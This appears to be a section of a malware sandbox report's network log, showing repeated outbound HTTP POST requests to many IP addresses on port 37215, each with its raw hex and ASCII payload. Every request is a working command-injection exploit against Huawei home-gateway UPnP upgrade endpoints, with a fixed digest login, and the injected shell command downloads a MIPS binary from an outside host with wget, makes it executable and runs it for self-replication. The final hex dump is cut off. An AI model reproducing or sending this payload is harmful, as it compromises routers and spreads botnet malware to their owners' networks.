                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  807192.168.2.134109841.113.207.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362153053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  808192.168.2.135963841.112.193.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362179041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  809192.168.2.134308841.47.155.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362261057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  810192.168.2.133431441.199.75.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.362327099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  811192.168.2.133403035.146.2.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.365271091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  812192.168.2.1357966155.108.209.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.365391970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  813192.168.2.133981841.23.88.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.365456104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  814192.168.2.1351312154.201.112.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368494034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  815192.168.2.1353992123.134.105.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368568897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  816192.168.2.1355476157.71.13.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368583918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 